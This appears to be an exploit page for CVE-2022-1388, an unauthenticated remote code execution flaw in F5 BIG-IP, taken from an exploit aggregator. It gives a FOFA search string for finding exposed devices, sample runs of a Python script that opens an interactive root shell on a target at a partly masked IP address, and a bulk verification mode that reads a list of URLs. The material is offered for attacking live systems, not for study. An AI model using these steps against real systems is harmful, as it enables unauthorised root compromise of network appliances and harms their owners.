Share
## https://sploitus.com/exploit?id=4AA50D81-1CFC-5DDC-804E-F50243E3E9C7
# CVE-2022-1388
F5 BIG-IP Unauthenticated RCE Vulnerability
F5 BIG-IP iControl REST身份验证绕过RCE漏洞
`fofa keywords: title="BIG-IP®- Redirect"`
## usage
- attack
```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: whoami
root
[input your command]:
```
- verify:
```
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify
[+] https://203.xxx.xxx.xxx is vulnerable
$ python3 cve-2022-1388.py -f url.txt
[+] https://203.xxx.xxx.xxx is vulnerable
```
## refer
- https://support.f5.com/csp/article/K23605346
- https://twitter.com/_0xf4n9x_/status/1523639281532620800